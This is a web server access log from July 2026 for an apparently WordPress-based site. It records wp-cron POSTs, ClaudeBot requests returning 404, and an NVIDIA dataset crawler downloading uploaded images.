185.21.40.28 - - [25/Jul/2026:20:55:09 +0200] "POST /wp-cron.php?doing_wp_cron=1785005709.3214340209960937500000 HTTP/1.1" 200 474 "-" "DNgrkehEPfEH"
216.73.217.117 - - [25/Jul/2026:20:55:07 +0200] "GET /dp/ff8d8f333239096 HTTP/2" 404 12542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:55:20 +0200] "GET /wp-content/uploads/program-dag-2-768x613-1.png HTTP/1.1" 200 68650 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
185.21.40.28 - - [25/Jul/2026:20:55:23 +0200] "POST /wp-cron.php?doing_wp_cron=1785005723.4245529174804687500000 HTTP/1.1" 200 474 "-" "wqzdJ41z0foz"
216.73.217.117 - - [25/Jul/2026:20:55:20 +0200] "GET /dp/f4014e0c2378342 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:55:27 +0200] "GET /wp-content/uploads/Danderyds_sjukhus-768x512.jpg HTTP/1.1" 200 74136 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:20:55:30 +0200] "GET /wp-content/uploads/kerstin1-scaled.jpeg HTTP/1.1" 200 109880 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
185.21.40.28 - - [25/Jul/2026:20:55:31 +0200] "POST /wp-cron.php?doing_wp_cron=1785005731.1912651062011718750000 HTTP/1.1" 200 474 "-" "Hto1upWl0N7a"
216.73.217.117 - - [25/Jul/2026:20:55:30 +0200] "GET /dp/b58b5b8a1916347 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:55:45 +0200] "GET /dp/3e1768304292184 HTTP/2" 404 12533 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:55:57 +0200] "GET /dp/5d36722b44857 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:56:02 +0200] "GET /wp-content/uploads/Bodil-Eskesen-Danmark-300x200.webp HTTP/1.1" 200 9562 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:20:56:07 +0200] "GET /wp-content/uploads/Skaermbillede-2024-11-06-kl.-09.45.09-1.png HTTP/1.1" 200 456665 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:56:06 +0200] "GET /dp/4b02dd2a5635797 HTTP/2" 404 12539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:56:11 +0200] "GET /wp-content/uploads/Bodil-Eskesen-Danmark-1024x683.webp HTTP/1.1" 200 74294 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
185.21.40.28 - - [25/Jul/2026:20:56:18 +0200] "POST /wp-cron.php?doing_wp_cron=1785005778.2875630855560302734375 HTTP/1.1" 200 474 "-" "YyJcC2OVuKWg"
216.73.217.117 - - [25/Jul/2026:20:56:17 +0200] "GET /dp/e396b1153282978 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:56:19 +0200] "GET /wp-content/uploads/program-dag-1-768x746-1.png HTTP/1.1" 200 106139 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
185.21.40.28 - - [25/Jul/2026:20:56:28 +0200] "POST /wp-cron.php?doing_wp_cron=1785005788.3461120128631591796875 HTTP/1.1" 200 474 "-" "GscDgEUluQVQ"
216.73.217.117 - - [25/Jul/2026:20:56:26 +0200] "GET /dp/2d787da4831789 HTTP/2" 404 12537 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:56:37 +0200] "GET /dp/e2a0d291332843 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:56:47 +0200] "GET /dp/7180b68d1364066 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:56:53 +0200] "GET /wp-content/uploads/HN_Jesper-Just-Fabricius_DSC4592_20cm-200x300.jpg HTTP/1.1" 200 22817 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:56:57 +0200] "GET /dp/feb9b80a3762929 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.101 - - [25/Jul/2026:20:56:58 +0200] "GET /dp/484c4fe31202300 HTTP/1.1" 404 13235 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; GoogleOther)"
54.165.162.167 - - [25/Jul/2026:20:57:03 +0200] "GET /wp-content/uploads/program-dag-2-768x613-1-300x239.png HTTP/1.1" 200 17268 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:20:57:06 +0200] "GET /wp-content/uploads/Linkoebing-1024x576.png HTTP/1.1" 200 366700 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:20:57:07 +0200] "GET /wp-content/uploads/Linkoebing-768x432.png HTTP/1.1" 200 213290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:57:07 +0200] "GET /dp/41b050c2160773 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:57:18 +0200] "GET /dp/8898f1a3302007 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.21.40.28 - - [25/Jul/2026:20:57:29 +0200] "POST /wp-cron.php?doing_wp_cron=1785005849.7578470706939697265625 HTTP/1.1" 200 474 "-" "p0wnCyXsDoMy"
216.73.217.117 - - [25/Jul/2026:20:57:28 +0200] "GET /dp/dc2161d14957796 HTTP/2" 404 12527 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:57:38 +0200] "GET /dp/44584fb7952975 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:57:43 +0200] "GET /wp-content/uploads/astrid-300x161.jpg HTTP/1.1" 200 16644 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:20:57:44 +0200] "GET /wp-content/uploads/Oslo-university.webp HTTP/1.1" 200 75540 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:57:48 +0200] "GET /dp/de601c60607106 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:57:58 +0200] "GET /dp/5694545a1765459 HTTP/2" 404 12535 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:58:08 +0200] "GET /dp/7b6ed5024841576 HTTP/2" 404 12539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:58:09 +0200] "GET /wp-content/uploads/astrid-768x411.jpg HTTP/1.1" 200 33363 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:58:18 +0200] "GET /dp/fe3774873988975 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.21.40.28 - - [25/Jul/2026:20:58:29 +0200] "POST /wp-cron.php?doing_wp_cron=1785005909.3563899993896484375000 HTTP/1.1" 200 474 "-" "KE6JfOXciGCQ"
216.73.217.117 - - [25/Jul/2026:20:58:28 +0200] "GET /dp/111b704a2003692 HTTP/2" 404 12542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:58:38 +0200] "GET /dp/2f5064743737393 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:58:41 +0200] "GET /wp-content/uploads/portrettTale-768x1024.jpg HTTP/1.1" 200 75102 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:58:48 +0200] "GET /dp/f783fe135843979 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:58:59 +0200] "GET /dp/495304565051382 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:59:08 +0200] "GET /dp/7b212c831241671 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.21.40.28 - - [25/Jul/2026:20:59:21 +0200] "POST /wp-cron.php?doing_wp_cron=1785005961.4459629058837890625000 HTTP/1.1" 200 474 "-" "F2MDEQOzJI4D"
216.73.217.117 - - [25/Jul/2026:20:59:20 +0200] "GET /dp/8537631e182830 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:59:24 +0200] "GET /wp-content/uploads/Danderyds_sjukhus-scaled.jpg HTTP/1.1" 200 414034 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:20:59:31 +0200] "GET /wp-content/uploads/portrettTale-1152x1536.jpg HTTP/1.1" 200 49303 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
185.21.40.28 - - [25/Jul/2026:20:59:31 +0200] "POST /wp-cron.php?doing_wp_cron=1785005971.7125809192657470703125 HTTP/1.1" 200 474 "-" "mXePuHpqKXbW"
216.73.217.117 - - [25/Jul/2026:20:59:29 +0200] "GET /dp/d6d428473273566 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:59:37 +0200] "GET /wp-content/uploads/2025-program-opdateret.png HTTP/1.1" 200 50191 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
185.21.40.28 - - [25/Jul/2026:20:59:46 +0200] "POST /wp-cron.php?doing_wp_cron=1785005986.4704959392547607421875 HTTP/1.1" 200 474 "-" "2rUt2b2nxe7d"
216.73.217.117 - - [25/Jul/2026:20:59:44 +0200] "GET /dp/7577d2625742035 HTTP/2" 404 12535 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:59:51 +0200] "GET /wp-content/uploads/steering_group-1024x676.png HTTP/1.1" 200 30208 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:59:53 +0200] "GET /dp/232083ab4310885 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.21.40.28 - - [25/Jul/2026:21:00:06 +0200] "POST /wp-cron.php?doing_wp_cron=1785006006.7753179073333740234375 HTTP/1.1" 200 474 "-" "yEBqBHJCZdhr"
216.73.217.117 - - [25/Jul/2026:21:00:04 +0200] "GET /dp/78642b974597218 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:21:00:08 +0200] "GET /wp-content/uploads/2025-program-opdateret-273x300.png HTTP/1.1" 200 16410 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:21:00:10 +0200] "GET /wp-content/uploads/steering_group-1536x1014.png HTTP/1.1" 200 120972 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:21:00:15 +0200] "GET /wp-content/uploads/Skaermbillede-2024-11-06-kl.-09.45.02-300x205.png HTTP/1.1" 200 52173 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:21:00:13 +0200] "GET /dp/6057aae61702294 HTTP/2" 404 12539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.21.40.28 - - [25/Jul/2026:21:00:26 +0200] "POST /wp-cron.php?doing_wp_cron=1785006026.0896070003509521484375 HTTP/1.1" 200 474 "-" "zvIKXz8FQrwZ"
216.73.217.117 - - [25/Jul/2026:21:00:24 +0200] "GET /dp/922be64a4323543 HTTP/2" 404 12537 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:21:00:26 +0200] "GET /wp-content/uploads/medium-shot-senior-women-pilates-reformer-class-1536x1229.jpg HTTP/1.1" 200 68898 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:21:00:27 +0200] "GET /wp-content/uploads/Danderyds_sjukhus-300x200.jpg HTTP/1.1" 200 14427 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
185.21.40.28 - - [25/Jul/2026:21:00:38 +0200] "POST /wp-cron.php?doing_wp_cron=1785006038.2831139564514160156250 HTTP/1.1" 200 474 "-" "WOIj5cNF0vMJ"
216.73.217.117 - - [25/Jul/2026:21:00:36 +0200] "GET /dp/648997563402048 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:21:00:46 +0200] "GET /dp/58e164b04923651 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:21:00:51 +0200] "GET /wp-content/uploads/Bodil-Eskesen-Danmark-768x512.webp HTTP/1.1" 200 44303 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:21:00:56 +0200] "GET /dp/245dd8593545906 HTTP/2" 404 12539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:21:01:09 +0200] "GET /wp-content/uploads/HN_Jesper-Just-Fabricius_DSC4592_20cm-768x1152.jpg HTTP/1.1" 200 59978 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:21:01:08 +0200] "GET /dp/48e7c6814817315 HTTP/2" 404 12539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:21:01:18 +0200] "GET /wp-content/uploads/Sofie-278x300.png HTTP/1.1" 200 50491 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
185.21.40.28 - - [25/Jul/2026:21:01:21 +0200] "POST /wp-cron.php?doing_wp_cron=1785006080.9632449150085449218750 HTTP/1.1" 200 474 "-" "EfwuDxJnZW7e"
216.73.217.117 - - [25/Jul/2026:21:01:18 +0200] "GET /dp/360be1425016319 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:21:01:22 +0200] "GET /wp-content/uploads/Norrlands-uni.jpg HTTP/1.1" 200 124420 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
185.21.40.28 - - [25/Jul/2026:21:01:30 +0200] "POST /wp-cron.php?doing_wp_cron=1785006090.2687439918518066406250 HTTP/1.1" 200 474 "-" "avmU1IzSeosy"
216.73.217.117 - - [25/Jul/2026:21:01:28 +0200] "GET /dp/43d64908741198 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:21:01:38 +0200] "GET /dp/5f5de6452749476 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:21:01:50 +0200] "GET /wp-content/uploads/kerstin1-1491x1536.jpeg HTTP/1.1" 200 76700 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:21:01:49 +0200] "GET /dp/b80e86043381851 HTTP/2" 404 12526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:21:01:54 +0200] "GET /wp-content/uploads/Aktiv-1113-kopi-220x300.png HTTP/1.1" 200 5991 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:21:01:58 +0200] "GET /dp/79683d70460446 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:21:02:11 +0200] "GET /dp/ba250002583826 HTTP/2" 404 12525 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:21:02:16 +0200] "GET /wp-content/uploads/Danderyds_sjukhus-1536x1024.jpg HTTP/1.1" 200 244401 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:21:02:21 +0200] "GET /wp-content/uploads/HN_Jesper-Just-Fabricius_DSC4592_20cm-1024x1536.jpg HTTP/1.1" 200 92705 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
185.21.40.28 - - [25/Jul/2026:21:02:22 +0200] "POST /wp-cron.php?doing_wp_cron=1785006142.6408491134643554687500 HTTP/1.1" 200 474 "-" "JKPTlzDXTZlo"
216.73.217.117 - - [25/Jul/2026:21:02:20 +0200] "GET /dp/438264c7774363 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.21.40.28 - - [25/Jul/2026:21:02:32 +0200] "POST /wp-cron.php?doing_wp_cron=1785006152.6008269786834716796875 HTTP/1.1" 200 474 "-" "764KYCwtnXYq"
216.73.217.117 - - [25/Jul/2026:21:02:31 +0200] "GET /dp/201969fa5383061 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:21:02:41 +0200] "GET /wp-content/uploads/kerstin1-768x791.jpeg HTTP/1.1" 200 36084 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:21:02:40 +0200] "GET /dp/67a01345181092 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:21:02:51 +0200] "GET /dp/020c43df226198 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:21:03:00 +0200] "GET /dp/333879123579097 HTTP/2" 404 12539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:21:03:03 +0200] "GET /wp-content/uploads/steering_group.png HTTP/1.1" 200 53480 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:21:03:11 +0200] "GET /dp/2f3329854294843 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.21.40.28 - - [25/Jul/2026:21:03:22 +0200] "POST /wp-cron.php?doing_wp_cron=1785006202.8541440963745117187500 HTTP/1.1" 200 474 "-" "WMy4i6Zj15Gu"
216.73.217.117 - - [25/Jul/2026:21:03:20 +0200] "GET /dp/a7715b223648320 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.21.40.28 - - [25/Jul/2026:21:03:33 +0200] "POST /wp-cron.php?doing_wp_cron=1785006213.0117630958557128906250 HTTP/1.1" 200 474 "-" "y7UAYvL1Rlz4"
